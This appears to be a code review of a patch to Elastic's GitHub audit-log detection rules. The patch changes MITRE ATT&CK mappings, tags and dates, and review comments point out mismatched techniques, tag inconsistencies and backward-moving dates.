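Review bot: Remapping a deleted GitHub App from T1562 Impair Defenses / Defense Evasion to T1648 Serverless Execution / Execution does not match what the audit event shows: deleting an integration removes a capability (commonly an audit, scanning or CI integration) rather than executing anything, and T1648 describes abuse of cloud serverless/automation to run code. The original Defense Evasion block looks more accurate; if Execution is kept, the rule description should explain why. The tags hunk above was changed to `"Tactic: Execution"` in step, so either choice needs both hunks updated together.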
@@ -52,7 +52,14 @@ Personal Access Tokens (PATs) facilitate automated access to GitHub repositories risk_score = 21 rule_id = "fb0afac5-bbd6-49b0-b4f8-44e5381e1587" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "threshold" @@ -65,29 +72,17 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threshold] field = ["github.hashed_token"] value = 1 diff --git a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml index 14f7d975ce4..1bd5931c41a 100644 --- a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml +++ b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml 
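Review bot: Replacing the Collection (T1213) and Exfiltration (T1567) entries with a single T1648 Serverless Execution / Execution mapping misclassifies a threshold rule that counts many private-repository clones from one PAT — mass cloning is data collection/exfiltration from a code repository, and nothing serverless is executed. T1213.003 Code Repositories and T1567.001 Exfiltration to Code Repository, both present elsewhere in this patch, are the closer techniques; if the Execution mapping stays, the `"Tactic: Execution"` tag change above is at least consistent with it.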
@@ -1,7 +1,7 @@ [metadata] creation_date = "2023/12/14" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -70,6 +70,14 @@ signal.rule.tags:("Use Case: UEBA" and "Data Source: Github") and kibana.alert.w ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.threshold] field = ["user.name"] value = 1 diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml index 3494dfa9a97..d7a9a7fb68d 100644 --- a/rules/integrations/github/execution_new_github_app_installed.toml +++ b/rules/integrations/github/execution_new_github_app_installed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -55,7 +55,13 @@ GitHub Apps enhance functionality by integrating with repositories and organizat risk_score = 47 rule_id = "1ca62f14-4787-4913-b7af-df11745a49da" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -66,13 +72,14 @@ configuration where event.dataset == "github.audit" and event.action == "integra [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1072" +name = "Software Deployment Tools" +reference = "https://attack.mitre.org/techniques/T1072/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml index 9a1b9aa5c52..13367f9a56f 100644 --- a/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml +++ b/rules/integrations/github/exfiltration_github_private_repository_turned_public.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/04" [rule] author = ["Elastic"] @@ -50,7 +50,14 @@ This rule flags when a previously private repository is made public, a high-risk risk_score = 21 rule_id = "8c707e4c-bd20-4ff4-bda5-4dc3b34ce298" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Impact", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
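Review bot: T1072 Software Deployment Tools / Execution for a newly installed GitHub App replaces T1098 Account Manipulation / Persistence; an installed app typically holds standing permissions on the organisation, which is the persistence angle the previous mapping captured, while T1072 is about abusing deployment software to run commands on hosts. Consider keeping a Persistence entry (T1098 or tactic-only) in addition to, or instead of, the Execution one, and make the `tags` hunk above match whichever set survives.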
@@ -61,6 +68,11 @@ event.action == "repo.access" and github.previous_visibility == "private" and gi [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" @@ -75,3 +87,11 @@ reference = "https://attack.mitre.org/techniques/T1567/001/" id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml index 32b3e7e8da2..b0f024d3a6b 100644 --- a/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml +++ b/rules/integrations/github/exfiltration_high_number_of_cloning_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -54,7 +54,13 @@ references = [ risk_score = 47 rule_id = "19f3674c-f4a1-43bb-a89c-e4c6212275e0" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' 
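Review bot: The new TA0040 Impact entry has no technique, and the T1020 Automated Exfiltration technique added in the previous hunk describes scripted, automated transfer, which a single `repo.access` visibility flip to public is not; the T1567.001 subtechnique already in the file covers the exposure-via-code-repository case. Consider dropping T1020 and either adding a concrete Impact technique or removing the Impact block together with its `"Tactic: Impact"` tag so the mapping stays precise.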
@@ -84,29 +90,21 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" - -[[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1020" name = "Automated Exfiltration" reference = "https://attack.mitre.org/techniques/T1020/" +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" diff --git a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml index 210386f4349..46b687e9fdb 100644 --- a/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml +++ b/rules/integrations/github/impact_github_repository_activity_from_unusual_ip.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/16" [rule] author = ["Elastic"] 
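Review bot: Removing the Collection entry with T1213.003 Code Repositories from the high-cloning-by-user rule takes away the technique that most directly describes mass repository cloning; the replacement T1567.001 Exfiltration to Code Repository means pushing stolen data into a repository, not cloning data out of one. Keep the Collection `[[rule.threat]]` block and the `"Tactic: Collection"` tag removed in the hunk above alongside the Exfiltration block rather than replacing it.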
@@ -24,7 +24,15 @@ references = [ risk_score = 21 rule_id = "daf2e0e0-0bab-4672-bfa1-62db0ee5ec22" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -34,20 +42,42 @@ event.dataset:"github.audit" and event.action:("git.push" or "git.clone") and gi [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1213.003" -name = "Code Repositories" -reference = "https://attack.mitre.org/techniques/T1213/003/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["source.ip", "github.repo"] 
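Review bot: The `tags` hunk above lists `"Tactic: Persistence"` but no threat entry maps TA0003, while the third threat block here maps TA0002 Execution which has no tag, so tags and `rule.threat` disagree on two tactics. Either change the tag to `"Tactic: Execution"` or change the block to `id = "TA0003"` / `name = "Persistence"` / `reference = "https://attack.mitre.org/tactics/TA0003/"`. The Impact entry is tactic-only, and T1059 Command and Scripting Interpreter is an odd fit for `git.push`/`git.clone` from an unusual IP, where the removed T1213.003 better describes what the audit log shows.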
diff --git a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml index 7bd22d1ff22..56e1f025d29 100644 --- a/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_closed_pull_requests_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ references = [ risk_score = 47 rule_id = "098bd5cc-fd55-438f-b354-7d6cd9856a08" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' 
@@ -87,16 +94,34 @@ from logs-github.audit-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" - -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml index 107dfb8e0bc..3273c4e208e 100644 --- a/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_failed_protected_branch_force_pushes_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] 
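Review bot: Adding an Exfiltration entry (T1020, T1567.001) to a rule that counts pull requests closed by one user attributes data-transfer techniques to an event that moves no data; closing PRs is a workflow disruption, which the Impact block already covers. The same Exfiltration block is appended to the failed- and successful-protected-branch-force-push rules below, where history rewriting is again Impact / T1485 territory. Unless there is evidence these rules surface exfiltration, drop the added block and the matching `"Tactic: Exfiltration"` tags.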
@@ -55,7 +55,14 @@ references = [ risk_score = 47 rule_id = "8bd1c36a-2c4f-4801-a43d-ba696c13ffc2" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -88,16 +95,34 @@ from logs-github.audit-* metadata _id, _index, _version framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" - -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml index b7651ea38de..46a8c27fb5d 100644 
--- a/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml +++ b/rules/integrations/github/impact_high_number_of_protected_branch_force_pushes_by_user.toml @@ -4,7 +4,7 @@ integration = ["github"] maturity = "production" min_stack_comments = "mv_contains ES|QL function only available post 9.2 in tech preview" min_stack_version = "9.2.0" -updated_date = "2026/03/23" +updated_date = "2026/01/27" [rule] author = ["Elastic"] @@ -57,7 +57,14 @@ references = [ risk_score = 47 rule_id = "0428c618-27f5-4d94-99e6-b254585aba69" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Impact", + "Tactic: Exfiltration", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' 
@@ -96,17 +103,30 @@ id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1020" +name = "Automated Exfiltration" +reference = "https://attack.mitre.org/techniques/T1020/" + [[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" [[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml index 6d017e6ec64..59d99cbea86 100644 --- a/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml +++ b/rules/integrations/github/initial_access_github_actions_bot_first_push_to_repo.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/09" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] 
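Review bot: The Exfiltration entry added in this hunk (T1020 Automated Exfiltration and T1567.001 Exfiltration to Code Repository) is not supported by what this rule detects: per the file name it counts protected-branch force pushes by a single user, which is a history-rewrite/integrity event, and the retained T1485 Data Destruction under Impact already describes that. T1567.001 covers an adversary pushing stolen data into a repository they control, and T1020 implies automated transfer of collected data; the hunk shows no change to the query that would evidence either. Unless the rule's description is being extended to cover the "repo as exfil channel" case, I would keep only the Impact block and drop the `"Tactic: Exfiltration"` tag added in the previous hunk, or document the exfiltration scenario in the rule so the mapping is defensible. The query body lies outside the hunk, so this is inferred from the title and the surviving Impact mapping.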
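Review bot: `updated_date` moves backwards in this hunk, from 2026/03/23 to 2025/12/09, which is the rule's `creation_date` on the context line just above, while the following hunks of this same file rewrite the tags and the ATT&CK mapping. A rule whose content changes should carry a newer date, not an older one, and the same backward move appears in every rule file of this patch, so it looks like a bulk reset rather than a per-file decision. If the intent is to undo an earlier bulk bump, say so in the commit message; otherwise set it to the day these mappings were changed, e.g. `updated_date = "2026/03/23"`.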
@@ -65,7 +65,14 @@ references = [ risk_score = 21 rule_id = "03245b25-3849-4052-ab48-72de65a82c35" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Initial Access", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -77,39 +84,32 @@ event.dataset: "github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1565" -name = "Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/" - -[[rule.threat.technique.subtechnique]] -id = "T1565.001" -name = "Stored Data Manipulation" -reference = "https://attack.mitre.org/techniques/T1565/001/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] -id = "T1195.001" -name = "Compromise Software Dependencies and Development Tools" -reference = "https://attack.mitre.org/techniques/T1195/001/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["github.org_id", "github.repo"] 
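Review bot: The tags and the threat mapping of this rule now disagree: the previous hunk's tag list carries `"Tactic: Initial Access"` and `"Tactic: Persistence"`, but the threat entries in this hunk are Initial Access (TA0001) and the newly added Execution (TA0002); there is no Persistence entry and no `"Tactic: Execution"` tag. One side has to change, either `"Tactic: Persistence"` becomes `"Tactic: Execution"`, or, if Persistence was the intent (as in the sibling workflow-injection rule that maps T1546), the T1059 block should be replaced by a Persistence entry. As written any tag-to-tactic consistency check will flag this rule, and the Execution mapping for a bot's first push is itself worth a sentence of justification in the description.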
diff --git a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml index 4e702825bc4..15f2ba57bd8 100644 --- a/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml +++ b/rules/integrations/github/initial_access_github_actions_workflow_injection_blocked.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/05" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] @@ -58,7 +58,15 @@ references = ["https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attac risk_score = 47 rule_id = "e8b37f18-4804-4819-8602-4aba1169c9f4" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" 
@@ -76,30 +84,41 @@ from logs-github.audit-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml index 9b48a818df9..5b6539b9114 100644 --- a/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml +++ b/rules/integrations/github/initial_access_github_register_self_hosted_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] 
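Review bot: The spacing in this hunk is inconsistent with the rest of the file and with the other rules in this patch: the blank line after `framework = "MITRE ATT&CK"` is removed, two blank lines are inserted before the Initial Access `[rule.threat.tactic]`, and the new Persistence `[[rule.threat]]` follows the Execution `reference` line with no separator at all. Nothing is syntactically wrong, but this reads like raw serializer output, whereas e.g. the PAT rule in the same patch keeps one blank line between tables. Run the repository's TOML formatter over these files (or hand-normalize to one blank line between `[[rule.threat]]`, technique, subtechnique and tactic tables) before merging.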
@@ -73,21 +73,23 @@ event.dataset:"github.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" - [[rule.threat.technique.subtechnique]] -id = "T1195.001" -name = "Compromise Software Dependencies and Development Tools" -reference = "https://attack.mitre.org/techniques/T1195/001/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + + [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.actor_ip"] diff --git a/rules/integrations/github/persistence_github_org_owner_added.toml b/rules/integrations/github/persistence_github_org_owner_added.toml index 1d8e0678699..6ebccba2979 100644 --- a/rules/integrations/github/persistence_github_org_owner_added.toml +++ b/rules/integrations/github/persistence_github_org_owner_added.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -54,7 +54,14 @@ GitHub organizations allow collaborative management of repositories, where the ' risk_score = 47 rule_id = "24401eca-ad0b-4ff9-9431-487a8e183af9" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -65,36 +72,19 @@ iam where event.dataset == "github.audit" and event.action == "org.add_member" a [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/github/persistence_new_pat_created.toml b/rules/integrations/github/persistence_new_pat_created.toml index 1b24e4314f7..ff972644a35 100644 --- a/rules/integrations/github/persistence_new_pat_created.toml +++ b/rules/integrations/github/persistence_new_pat_created.toml @@ -2,7 +2,7 @@ creation_date = "2023/12/16" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] 
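Review bot: The replacement technique in this hunk, T1136.003 Create Account: Cloud Account, does not describe the event the rule keys on: `event.action == "org.add_member"` (visible in the hunk header context) adds an existing GitHub user to the organization, so no account is created. The removed T1098.003 Additional Cloud Roles is the closer description of granting the owner role, and ATT&CK lists it under both Persistence and Privilege Escalation, which is why the deleted TA0004 block was defensible rather than a duplicate. I would restore T1098 with `id = "T1098.003"` / `name = "Additional Cloud Roles"` as the subtechnique, and keep the Privilege Escalation entry together with the `"Tactic: Privilege Escalation"` tag removed in the earlier hunk, unless one tactic per rule is now deliberate policy.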
